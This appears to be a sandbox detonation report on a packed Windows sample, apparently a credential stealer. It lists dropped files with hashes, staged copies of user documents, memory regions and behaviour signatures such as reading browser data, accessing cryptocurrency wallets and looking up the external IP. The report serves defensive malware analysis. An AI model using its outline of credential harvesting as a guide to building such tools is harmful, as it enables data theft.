| MD5 | 0c06eff0f04b3193a091aa6f77c3ff3f |
| SHA1 | fdc8f3b40b91dd70a65ada8c75da2f858177ca1b |
| SHA256 | 5ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2 |
| SHA512 | 985974e1487bbb8f451588f648a4cf4d754dbfc97f1ab4733dd21cdeb1a3abad017c34ed6ee4bc89ac01ea19b6060ea8f817693336133d110b715c746d090e49 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_sqlite3.pyd
| MD5 | 00a246686f7313c2a7fe65bbe4966e96 |
| SHA1 | a6c00203afab2d777c99cc7686bab6d28e4f3f70 |
| SHA256 | cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67 |
| SHA512 | c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_socket.pyd
| MD5 | abe1268857e3ace12cbd532e65c417f4 |
| SHA1 | dd987f29aabc940f15cd6bd08164ff9ae95c282f |
| SHA256 | 7110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5 |
| SHA512 | 392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_queue.pyd
| MD5 | 3f13115b323fb7516054ba432a53e413 |
| SHA1 | 340b87252c92c33fe21f8805acb9dc7fc3ff8999 |
| SHA256 | 52a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2 |
| SHA512 | 6b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_lzma.pyd
| MD5 | 8bdd52b7bcab5c0779782391686f05c5 |
| SHA1 | 281aad75da003948c82a6986ae0f4d9e0ba988eb |
| SHA256 | d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a |
| SHA512 | 086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_hashlib.pyd
| MD5 | 82d28639895b87f234a80017a285822a |
| SHA1 | 9190d0699fa2eff73435adf980586c866639205f |
| SHA256 | 9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e |
| SHA512 | 4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_decimal.pyd
| MD5 | 072e08b39c18b779446032bf2104247b |
| SHA1 | a7ddad40ef3f0472e3c9d8a9741bd97d4132086c |
| SHA256 | 480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b |
| SHA512 | c3cdfe14fd6051b92eeff45105c093dce28a4dcfd9f3f43515a742b9a8ee8e4a2dce637e9548d21f99c147bac8b9eb79bcbcd5fc611197b52413b8a62a68da02 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_bz2.pyd
| MD5 | db5ec505d7c19345ca85d896c4bd7ef4 |
| SHA1 | c459bb6750937fbdc8ca078a74fd3d1e8461b11c |
| SHA256 | d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9 |
| SHA512 | 0d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\unicodedata.pyd
| MD5 | 26f7ccda6ba4de5f310da1662f91b2ba |
| SHA1 | 5fb9472a04d6591ec3fee7911ad5b753c62ecf17 |
| SHA256 | 1eae07acffb343f4b3a0abbaf70f93b9ec804503598cfffdeec94262b3f52d60 |
| SHA512 | 0b5e58945c00eefc3b9f21a73359f5751966c58438ae9b86b6d3ffd0f60a648676b68a0109fa2fe1260d1b16c16b026e0c1d596fec3443638d4ce05ea04665ca |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\sqlite3.dll
| MD5 | dcc391b3b52bac0f6bd695d560d7f1a9 |
| SHA1 | a061973a5f7c52c34a0b087cc918e29e3e704151 |
| SHA256 | 762adf4e60bff393fba110af3d9694cbbdc3c6b6cd18855a93411ea8e71a4859 |
| SHA512 | 42a2606783d448200c552389c59cbf7c5d68a00911b36e526af013e9b8e3a1daa80327cb30efe0fe56323635cc2cb37bd3474b002058ba59f65e2a9d8f6046b8 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\select.pyd
| MD5 | 062f0a9179c51d7ed621dac3dd222abd |
| SHA1 | c7b137a2b1e7b16bfc6160e175918f4d14cf107c |
| SHA256 | 91bea610f607c8a10c2e70d687fb02c06b9e1e2fa7fcfab355c6baea6eddb453 |
| SHA512 | b5a99efd032f381d63bc46c9752c1ddec902dae7133a696e20d3d798f977365caf25874b287b19e6c52f3e7a8ae1beb3d7536cd114775dc0af4978f21a9e818e |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\libssl-1_1.dll
| MD5 | eac369b3fde5c6e8955bd0b8e31d0830 |
| SHA1 | 4bf77158c18fe3a290e44abd2ac1834675de66b4 |
| SHA256 | 60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c |
| SHA512 | c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\libcrypto-1_1.dll
| MD5 | daa2eed9dceafaef826557ff8a754204 |
| SHA1 | 27d668af7015843104aa5c20ec6bbd30f673e901 |
| SHA256 | 4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914 |
| SHA512 | 7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea |
memory/5096-54-0x00007FFEA6FD0000-0x00007FFEA6FFD000-memory.dmp
memory/5096-56-0x00007FFEA70F0000-0x00007FFEA7109000-memory.dmp
memory/5096-58-0x00007FFEA6730000-0x00007FFEA6753000-memory.dmp
memory/5096-60-0x00007FFE97290000-0x00007FFE97400000-memory.dmp
memory/5096-64-0x00007FFEA6D60000-0x00007FFEA6D6D000-memory.dmp
memory/5096-63-0x00007FFEA6FB0000-0x00007FFEA6FC9000-memory.dmp
memory/5096-66-0x00007FFEA6660000-0x00007FFEA668E000-memory.dmp
memory/5096-72-0x00007FFE96890000-0x00007FFE96C05000-memory.dmp
memory/5096-71-0x000001BF3C030000-0x000001BF3C3A5000-memory.dmp
memory/5096-70-0x00007FFE96CE0000-0x00007FFE96D98000-memory.dmp
memory/5096-73-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
memory/5096-80-0x00007FFEA6610000-0x00007FFEA661D000-memory.dmp
memory/5096-82-0x00007FFE96770000-0x00007FFE9688C000-memory.dmp
memory/5096-79-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
memory/5096-75-0x00007FFEA0AC0000-0x00007FFEA0AD4000-memory.dmp
memory/4288-88-0x000001DC7DA00000-0x000001DC7DA22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkzb4fdv.trg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.cmdline
| MD5 | 72fb388fb1fb36a7303f43dda7f3d5a2 |
| SHA1 | f5dbb4b6bf3e7076f402b3abc04f853bfc011cd5 |
| SHA256 | 64f4ce8b88defd20abc3bfbcd9ab03078c2a27be11041ce20120d5d3d45dc527 |
| SHA512 | 8fabcb3b68d7162b4b2baf31aaec444f4826ee36fd79c0704c2df7e01dd9c00a7da924c18bd21fb10c9c2fe84dbb79ba80bef1fdcd2b20256270d11c959ab9bc |
\??\c:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\cjmodovl\CSCDFC7E7C12BCE4A51BE5DBD8CF3DBD10.TMP
| MD5 | 527b9a0f14cb62205aba62527266b91b |
| SHA1 | a4caedd37441c8c789d8efefd2fe493ba1f78233 |
| SHA256 | bd87bed0aa42d06e8ed2397c49e7006d03192bb3d4cf89c616941c8e9b053283 |
| SHA512 | 9e01905cd101927388591ac272806f46ecb7e31c42d7a9434089e68a7a1749bb3981c56d9d82b2eb931aab8e6610ac3ee3ddb118dcfa416a6ce860da972195dc |
C:\Users\Admin\AppData\Local\Temp\RES6580.tmp
| MD5 | 5b37e5fd3d8fa7288580011fa6ecb145 |
| SHA1 | b4c6e4a2ab11df8bcd53cdab7e0a4c44c21f94e9 |
| SHA256 | cd044f98ea83c36d8328224ba6d61c732d307a29426e6c91dd0751257b6b4413 |
| SHA512 | b2bf89e42a489d57ec8f11f58cb5b309394bb74720ba87e56d0232a6af582651a7804e800c928403a3b7cab680c92e54ccfbefcbbf327871047859daf48808a0 |
C:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.dll
| MD5 | 3fb66e9df49a7dcdc7ebd503269e9225 |
| SHA1 | 973e2d1a225643999ea1682ba0faa4abb11b8631 |
| SHA256 | 05793c969468237b88c3981519a38ebdef5f8d84217c6ee38b481d04c57c9d21 |
| SHA512 | 6f131ea585976c9d6a63f4cb55493a4fb345fc88bdecb73a74ee6b7efa4cdf9c4f0d037ee1cf6f15bd874b33bd6967ff67171f156bf9a95c9eb513c28099c806 |
memory/992-201-0x0000021CA1650000-0x0000021CA1658000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8740e7db6a0d290c198447b1f16d5281 |
| SHA1 | ab54460bb918f4af8a651317c8b53a8f6bfb70cd |
| SHA256 | f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5 |
| SHA512 | d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 55477ffee61aa2228c53f46f79aa347b |
| SHA1 | c84a730dd80964da4bcd095c4c147f99979a75e7 |
| SHA256 | 26164bcf29aaf21058c9df80ce221b2d7d89a1e877b607509a3acb28ee9d51c5 |
| SHA512 | ad610bd3fcaf61ee766c60640d583d27fc6ec5222ce4579b3ca49748aaf0d63dbc0b94423933e8b26da67edd4d6ce515439dc6427c0e29166cd8e10b5f34c132 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\EnterBackup.mhtml
| MD5 | 79b1f34af3adcdb50dd8658d1d3a3c72 |
| SHA1 | 69b23b6294c3ade09b1766d7af887c414c0fd7ed |
| SHA256 | 0553eeeea47d4f7f413d9c6cfc7638fd903b71e1a83561592e9e19c537d04f98 |
| SHA512 | bf25e8af3533cdad3c232865a34224f892f65ddf92f65b562c1da0c508422457d8627184b0455fa46b9366b71a84680c0af388176f52cbd98a01491d5afae7ca |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\SyncAssert.xlsx
| MD5 | 37ccab46026dd7ca51d90dd17d0528ce |
| SHA1 | da1571e5292e278fc24b9314d906746e252b1777 |
| SHA256 | 0363e2f030b2047b19bcc15da683de580ca4962c00a70c497a68e0f6b9325fd9 |
| SHA512 | a57c96f550335ce475e988bd94c40fb88084744fb685ed101467060c6185bdbad5f842f0e0cc5ae1c47476d9c8ecfe4f97b28d604b901e3dd84c2027221b8e26 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupPush.xps
| MD5 | c368590170a97b09426f8c2b7215140c |
| SHA1 | 3a3fc1022571a691a98adf6c117e6850fbf83f8d |
| SHA256 | e340d5978894c9416640c94cf4acf519c13addcd14adbdfa8a120c216a850620 |
| SHA512 | 757f099c4fc5430c26b67b9bbcf9b8cb2fe6cd99f1ea3806f8c0bfa2e55497e9474d08f2be62fa15c1ee68a70dbb36de174f7b688e38fbb77658b56e4c6589e7 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\CompareRegister.xls
| MD5 | ed9170e640596148983e6c96cf6cff6f |
| SHA1 | 0372c72876466b4c17dcac09046c5c8b47fdf8a5 |
| SHA256 | 98e77c081deda105c05e43ee73505e4dbbb65b757e2a7fa45b53ccda2be1f8b4 |
| SHA512 | 28d146552ed9b2c210a530be33f3586c0173bb8bec8a865e364a0c810d49198b15b33f61744b3838568f0f75072219da4894e8c2325411cabcfbde44dbd1717e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EditCompare.pdf
| MD5 | 493b30400f99969536431a3640bc4851 |
| SHA1 | 22716d986a00aeac7774f04d51ebf7dbc8302394 |
| SHA256 | d3e420df3b4a555870b72d2a4e0c51cb0767a7e5d39c0ec1ef04ebc113dfff36 |
| SHA512 | ce44f02db3684946c85508fd0cfead2acd0ca8a3538b3ed22fa50df07be67d229551b8449653c3f9f77535cbf67ea49d4fbcfd5070034d39808e90eef0fd3127 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\FindReset.txt
| MD5 | 9e63624f3487f45fa5bdefce5101ee09 |
| SHA1 | 038ce4029d97feac7066dbc938dcdf2653414115 |
| SHA256 | c49fab4691ca8773bed0e9f9402cf75f8f632ef820dba83c31b5f5683bd9908a |
| SHA512 | 810c80e4b7851c6703def38160d212e2e9cf554c4f7e471f74822f02c7f5a6563955f098352b43e1ec4df74d5a97e5421c755501f486a668b3122a21d82c78d3 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SaveWait.xlsx
| MD5 | 347061b7ecb8ed9b45c4465843e47cd9 |
| SHA1 | 662376155c439295b7d1b51a2e5c959aa2b6db36 |
| SHA256 | 86999fe4ccaba5994d35050188249506c27cc71e236168cbf16051482b3092c4 |
| SHA512 | 1a34ced24adc3a57665899e8c4b44d2cfba0f08a43aca8645532310ef12e7c77f1a031e3e8b2495c71e6d3ad4480a57fed49f2dc031ae4e36a25799c87ba14ce |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SyncCopy.csv
| MD5 | 5e2f2496ea2956a1ab5ff3165ade1457 |
| SHA1 | 3047a197bc84a0ab93f867646ad9b001cfcb0cb4 |
| SHA256 | 787b63a2785264b6a1188d3279bbf640fb31e4341be36d0f09e460ea8462b85d |
| SHA512 | e56699b6b5ac6ed437478708265b47715aed3fab385e5e871702cbd33df9ceecd43e9508be4b4a05ddbb7ce90711c2dfb0fdf5377113a49bf23a2f397fe01436 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UninstallUnpublish.csv
| MD5 | ceadb733b1534869d0d69e323713af09 |
| SHA1 | 80d19e8d357e43ced3af83041c3327dd6d2cd89a |
| SHA256 | 95f603f55f2b26ca89d77561f507e1393d01e3279cd311984d0609e3bef65e72 |
| SHA512 | 7690fa6216d571f56cc528f84a56dd138ec8829940e22ec794bbf0f5c6b0907a52143f3422aa3c711be45b944317e5290bae0974d7e17bd78fb99a18b1a6dae8 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UpdateWrite.doc
| MD5 | b1bd7474a1f03b7c088984808bb66d58 |
| SHA1 | 7873c765934599d8a1c7f61db1e4b9f8f1660e5d |
| SHA256 | c847259e68e05b8b2e84fff236d47a3152e2089c832043973a5033fec25b576e |
| SHA512 | ffa393f29c5707702ed699e8fd64e84858c15f358ac83849ea5ccfbf823e8215a2fe406750f58f6c4a0fb0cc29377365dbfb54d2d16a4998a8891057ab6def0c |
memory/5096-265-0x00007FFEA6730000-0x00007FFEA6753000-memory.dmp
memory/5096-286-0x00007FFE97290000-0x00007FFE97400000-memory.dmp
memory/5096-288-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
memory/5096-302-0x00007FFEA6FB0000-0x00007FFEA6FC9000-memory.dmp
memory/5096-301-0x00007FFE96770000-0x00007FFE9688C000-memory.dmp
memory/5096-297-0x00007FFE96CE0000-0x00007FFE96D98000-memory.dmp
memory/5096-296-0x00007FFEA6660000-0x00007FFEA668E000-memory.dmp
memory/5096-287-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
memory/5096-298-0x00007FFE96890000-0x00007FFE96C05000-memory.dmp
memory/5096-303-0x000001BF3C030000-0x000001BF3C3A5000-memory.dmp
memory/5096-332-0x00007FFEA6610000-0x00007FFEA661D000-memory.dmp
memory/5096-339-0x00007FFEA6730000-0x00007FFEA6753000-memory.dmp
memory/5096-344-0x00007FFE96CE0000-0x00007FFE96D98000-memory.dmp
memory/5096-343-0x00007FFEA6660000-0x00007FFEA668E000-memory.dmp
memory/5096-342-0x00007FFEA6D60000-0x00007FFEA6D6D000-memory.dmp
memory/5096-341-0x00007FFEA6FB0000-0x00007FFEA6FC9000-memory.dmp
memory/5096-340-0x00007FFE97290000-0x00007FFE97400000-memory.dmp
memory/5096-338-0x00007FFEA70F0000-0x00007FFEA7109000-memory.dmp
memory/5096-337-0x00007FFEA6FD0000-0x00007FFEA6FFD000-memory.dmp
memory/5096-336-0x00007FFEAC8E0000-0x00007FFEAC8EF000-memory.dmp
memory/5096-335-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
memory/5096-334-0x00007FFE96890000-0x00007FFE96C05000-memory.dmp
memory/5096-333-0x00007FFE96770000-0x00007FFE9688C000-memory.dmp
memory/5096-331-0x00007FFEA0AC0000-0x00007FFEA0AD4000-memory.dmp
memory/5096-319-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win11-20240508-en
Max time kernel
89s
Max time network
104s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
